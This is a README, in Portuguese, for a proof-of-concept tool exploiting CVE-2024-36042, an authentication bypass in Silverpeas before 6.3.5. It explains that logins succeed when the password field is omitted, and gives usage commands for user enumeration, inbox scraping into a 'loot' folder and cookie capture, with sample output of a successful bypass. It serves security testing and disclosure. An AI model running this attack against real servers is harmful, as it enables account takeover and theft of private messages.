
Python PoC para CVE-2024-36042, bypass de autenticação em Silverpeas < 6.3.5. Inclui detecção de versão, enumeração de usuários multithread, extração de mensagens e relatórios estruturados para testes de segurança autorizados.
Uma prova de conceito Python3 limpa e de nível profissional para CVE-2024-36042 — uma bypass de autenticação no Silverpeas < 6.3.5 causada pela falta de validação de senha em
AuthenticationServlet.
O AuthenticationServlet do Silverpeas aceita uma solicitação de login mesmo quando o parâmetro Password é omitido do corpo do POST, concedendo acesso de sessão autenticada a qualquer nome de usuário conhecido. Esta ferramenta demonstra a vulnerabilidade de forma responsável por meio de um framework de exploit modular e com threads, com reconhecimento avançado, extração de dados e geração de relatórios profissionais.
Afetado: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
A ferramenta suporta quatro modos principais de saída para mensagens extraídas via --message-output:
console (Padrão): Exibe mensagens limpas diretamente no terminal com realce de palavras-chave.markdown: Gera um relatório único {username}_messages.md por conta no diretório de saída.files: Cria uma pasta por conta e salva cada mensagem como um arquivo individual (ex.: message_0006.md) com IDs preenchidos com zeros para uma ordenação limpa no filesystem.both: Combina os modos console e markdown.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optional: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Base URL of Silverpeas (required)
-u, --user Single username to target
--userlist File with one username per line
--dump-messages Scrape and display inbox messages
--max-id Max message ID to check (default: 50)
--threads Concurrent workers (default: 5)
--proxy HTTP proxy URL
--message-output Output mode: {console, markdown, files, both}
--output-format File format: {md, txt}
--json Export full JSON report
--csv Export CSV of scraped messages
--outdir Output directory for exports
--no-color Disable ANSI color output (useful for logs)
--save-raw-html Save original HTML responses for debugging
--check-version Fingerprint version only
--no-exploit Skip exploitation (pair with --check-version)
--quiet, -q Minimal output
--no-banner Suppress banner
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
Este repositório faz parte do meu portfólio de segurança ofensiva. Ele demonstra:
Esta ferramenta é fornecida apenas para testes de segurança autorizados, pesquisa e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha permissão explícita antes de testar qualquer infraestrutura que você não possua.
MIT
| Recurso | Descrição |
|---|
| Detecção de Versão | Identifica a versão do Silverpeas e o status da vulnerabilidade antes da exploração. |
| Multithread | Enumeração concorrente de usuários via ThreadPoolExecutor com saída thread-safe. |
| Descoberta Avançada | Descoberta de endpoints multilíngue (inglês/francês) com sondagem de múltiplos IDs. |
| Extração de Dados | Extração de mensagens de alta fidelidade com deduplicação e filtragem de conteúdo repetitivo. |
| Saída Flexível | Suporte a Console, relatórios Markdown e exportação de arquivos individuais (.md ou .txt). |
| Proxy e Depuração | Roteie através do Burp/ZAP (--proxy) e salve HTML bruto para depuração do parser. |
| UX Limpa | Tabelas de resumo ASCII, realce de palavras-chave e controle opcional de cores ANSI. |